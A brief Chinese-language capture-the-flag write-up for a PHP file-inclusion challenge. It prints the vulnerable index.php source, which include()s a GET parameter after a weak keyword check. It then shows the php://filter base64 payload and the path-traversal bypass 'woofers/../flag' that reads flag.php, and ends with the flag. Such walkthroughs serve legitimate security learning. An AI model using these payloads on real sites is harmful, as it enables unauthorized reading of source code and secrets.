题目
这里有传参
文件包含使用伪协议读取flag
先读取index.php查看
/index.php?category=php://filter/read=convert.base64-encode/resource=index
解码
index.php源码
php
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>传入的category需要有woofers,meowers,index才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php
尝试直接读取/index.php?category=woofers/../flag
php
/index.php?category=php://filter/read=convert.base64-encode/resource=woofers/../flag
解码
拿下flag
flag{85254eba-a050-49cd-a3be-4e9859e51241}